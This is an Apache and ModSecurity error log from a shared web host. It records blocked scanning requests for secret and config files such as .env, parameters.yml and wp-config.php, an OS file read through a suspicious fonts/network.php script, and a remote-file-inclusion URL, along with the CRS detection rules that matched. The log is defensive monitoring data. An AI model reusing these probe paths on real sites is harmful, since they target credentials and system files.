[Mon May 11 22:02:03.222954 2026] [security2:error] [pid 1601130:tid 1601162] [client 193.111.117.35:59690] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /fastapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/fastapi/.env"] [unique_id "agI1u3EgAO_835W6c1mN2gAAAEw"]
[Mon May 11 22:02:03.223110 2026] [security2:error] [pid 1601130:tid 1601162] [client 193.111.117.35:59690] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/fastapi/.env"] [unique_id "agI1u3EgAO_835W6c1mN2gAAAEw"]
[Mon May 11 22:02:03.223767 2026] [security2:error] [pid 1534836:tid 1534892] [client 193.111.117.35:59654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /instance/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/instance/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtLQAAAVU"]
[Mon May 11 22:02:03.223931 2026] [security2:error] [pid 1534836:tid 1534892] [client 193.111.117.35:59654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/instance/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtLQAAAVU"]
[Mon May 11 22:02:03.225089 2026] [security2:error] [pid 1601130:tid 1601162] [client 193.111.117.35:59690] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u3EgAO_835W6c1mN2gAAAEw"]
[Mon May 11 22:02:03.225484 2026] [security2:error] [pid 1534836:tid 1534892] [client 193.111.117.35:59654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtLQAAAVU"]
[Mon May 11 22:02:03.243837 2026] [security2:error] [pid 1534836:tid 1534888] [client 193.111.117.35:59848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uvicorn/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/uvicorn/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtLgAAAVE"]
[Mon May 11 22:02:03.244105 2026] [security2:error] [pid 1534836:tid 1534888] [client 193.111.117.35:59848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/uvicorn/.env"] [unique_id "agI1u9eaRXe5lR8y0ZOtLgAAAVE"]
[Mon May 11 22:02:03.245115 2026] [security2:error] [pid 1534836:tid 1534888] [client 193.111.117.35:59848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtLgAAAVE"]
[Mon May 11 22:02:03.449258 2026] [security2:error] [pid 1601130:tid 1601152] [client 193.111.117.35:60074] ModSecurity: Warning. Matched phrase "/config/security.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/security.yml found within REQUEST_FILENAME: /app/config/security.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/config/security.yml"] [unique_id "agI1u3EgAO_835W6c1mN3wAAAEI"]
[Mon May 11 22:02:03.449487 2026] [security2:error] [pid 1601130:tid 1601152] [client 193.111.117.35:60074] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/config/security.yml"] [unique_id "agI1u3EgAO_835W6c1mN3wAAAEI"]
[Mon May 11 22:02:03.450427 2026] [security2:error] [pid 1601130:tid 1601152] [client 193.111.117.35:60074] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u3EgAO_835W6c1mN3wAAAEI"]
[Mon May 11 22:02:03.456360 2026] [security2:error] [pid 1605480:tid 1605528] [client 193.111.117.35:59024] ModSecurity: Warning. Matched phrase "/config/config_dev.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config_dev.yml found within REQUEST_FILENAME: /app/config/config_dev.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/config/config_dev.yml"] [unique_id "agI1ux2Cvzd_nyNfUm_2eAAAAQY"]
[Mon May 11 22:02:03.456515 2026] [security2:error] [pid 1605480:tid 1605528] [client 193.111.117.35:59024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/config/config_dev.yml"] [unique_id "agI1ux2Cvzd_nyNfUm_2eAAAAQY"]
[Mon May 11 22:02:03.457077 2026] [security2:error] [pid 1605480:tid 1605528] [client 193.111.117.35:59024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ux2Cvzd_nyNfUm_2eAAAAQY"]
[Mon May 11 22:02:03.494851 2026] [security2:error] [pid 1534836:tid 1534874] [client 193.111.117.35:59052] ModSecurity: Warning. Matched phrase "/config/routing.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/routing.yml found within REQUEST_FILENAME: /app/config/routing.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/config/routing.yml"] [unique_id "agI1u9eaRXe5lR8y0ZOtMgAAAUM"]
[Mon May 11 22:02:03.495071 2026] [security2:error] [pid 1534836:tid 1534874] [client 193.111.117.35:59052] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/config/routing.yml"] [unique_id "agI1u9eaRXe5lR8y0ZOtMgAAAUM"]
[Mon May 11 22:02:03.496244 2026] [security2:error] [pid 1534836:tid 1534874] [client 193.111.117.35:59052] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtMgAAAUM"]
[Mon May 11 22:02:03.554496 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:59076] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/symfony/.env"] [unique_id "agI1ux2Cvzd_nyNfUm_2eQAAARE"]
[Mon May 11 22:02:03.554701 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:59076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/symfony/.env"] [unique_id "agI1ux2Cvzd_nyNfUm_2eQAAARE"]
[Mon May 11 22:02:03.555297 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:59076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1ux2Cvzd_nyNfUm_2eQAAARE"]
[Mon May 11 22:02:03.594400 2026] [security2:error] [pid 1534836:tid 1534887] [client 193.111.117.35:59078] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /symfony/app/config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/symfony/app/config/parameters.yml"] [unique_id "agI1u9eaRXe5lR8y0ZOtMwAAAVA"]
[Mon May 11 22:02:03.594621 2026] [security2:error] [pid 1534836:tid 1534887] [client 193.111.117.35:59078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/symfony/app/config/parameters.yml"] [unique_id "agI1u9eaRXe5lR8y0ZOtMwAAAVA"]
[Mon May 11 22:02:03.595234 2026] [security2:error] [pid 1534836:tid 1534887] [client 193.111.117.35:59078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1u9eaRXe5lR8y0ZOtMwAAAVA"]
[Mon May 11 22:02:34.445197 2026] [security2:error] [pid 1605480:tid 1605543] [client 47.128.47.104:54776] ModSecurity: Warning. Matched phrase "/composer.lock" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.lock found within REQUEST_FILENAME: /composer.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/composer.lock"] [unique_id "agI12h2Cvzd_nyNfUm_2nwAAARU"]
[Mon May 11 22:02:34.445799 2026] [security2:error] [pid 1605480:tid 1605543] [client 47.128.47.104:54776] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/composer.lock"] [unique_id "agI12h2Cvzd_nyNfUm_2nwAAARU"]
[Mon May 11 22:02:34.553540 2026] [security2:error] [pid 1605480:tid 1605543] [client 47.128.47.104:54776] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI12h2Cvzd_nyNfUm_2nwAAARU"]
[Mon May 11 22:03:35.740616 2026] [proxy_fcgi:error] [pid 1590352:tid 1590410] [client 46.22.135.218:37618] AH01071: Got error 'Primary script unknown'
[Mon May 11 22:03:38.889851 2026] [proxy_fcgi:error] [pid 1590352:tid 1590409] [client 162.241.152.21:35100] AH01071: Got error 'Primary script unknown'
[Mon May 11 22:04:31.167578 2026] [security2:error] [pid 1590352:tid 1590401] [client 216.73.216.110:53225] ModSecurity: Warning. Matched phrase ".profile" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .profile found within ARGS:filesrc: /etc/lvm/profile/cache-smq.profile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agI2T61q0G_aXAqWauTzLwAAAIk"]
[Mon May 11 22:04:31.171056 2026] [security2:error] [pid 1590352:tid 1590401] [client 216.73.216.110:53225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agI2T61q0G_aXAqWauTzLwAAAIk"]
[Mon May 11 22:04:31.272133 2026] [security2:error] [pid 1590352:tid 1590401] [client 216.73.216.110:53225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI2T61q0G_aXAqWauTzLwAAAIk"]
[Mon May 11 22:04:48.329958 2026] [ssl:error] [pid 1601130:tid 1601173] (EAI 2)Name or service not known: [client 51.68.111.216:9617] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:04:48.330265 2026] [ssl:error] [pid 1601130:tid 1601173] AH01941: stapling_renew_response: responder error
[Mon May 11 22:05:11.933564 2026] [security2:error] [pid 1606352:tid 1606438] [client 43.130.174.37:57964] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/mentions.html"] [unique_id "agI2d3o_DFxNSZVmaX3IQQAAANM"]
[Mon May 11 22:05:17.249111 2026] [security2:error] [pid 1534836:tid 1534883] [client 57.141.20.27:48510] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://188.166.212.54 found within ARGS:url: http://188.166.212.54"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI2fdeaRXe5lR8y0ZOuWgAAAUw"]
[Mon May 11 22:05:17.250029 2026] [security2:error] [pid 1534836:tid 1534883] [client 57.141.20.27:48510] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI2fdeaRXe5lR8y0ZOuWgAAAUw"]
[Mon May 11 22:05:17.259343 2026] [security2:error] [pid 1534836:tid 1534883] [client 57.141.20.27:48510] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI2fdeaRXe5lR8y0ZOuWgAAAUw"]
[Mon May 11 22:05:19.733195 2026] [security2:error] [pid 1601130:tid 1601158] [client 47.128.50.90:33984] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.sorry"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.la-grande-fabrique.com"] [uri "/wp-config.php.sorry"] [unique_id "agI2f3EgAO_835W6c1mPtQAAAEg"]
[Mon May 11 22:05:19.733450 2026] [security2:error] [pid 1601130:tid 1601158] [client 47.128.50.90:33984] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.la-grande-fabrique.com"] [uri "/wp-config.php.sorry"] [unique_id "agI2f3EgAO_835W6c1mPtQAAAEg"]
[Mon May 11 22:05:19.733726 2026] [security2:error] [pid 1601130:tid 1601158] [client 47.128.50.90:33984] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.la-grande-fabrique.com"] [uri "/wp-config.php.sorry"] [unique_id "agI2f3EgAO_835W6c1mPtQAAAEg"]
[Mon May 11 22:05:58.491584 2026] [ssl:error] [pid 1606352:tid 1606425] (EAI 2)Name or service not known: [client 74.7.241.176:49490] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:05:58.495768 2026] [ssl:error] [pid 1606352:tid 1606425] AH01941: stapling_renew_response: responder error
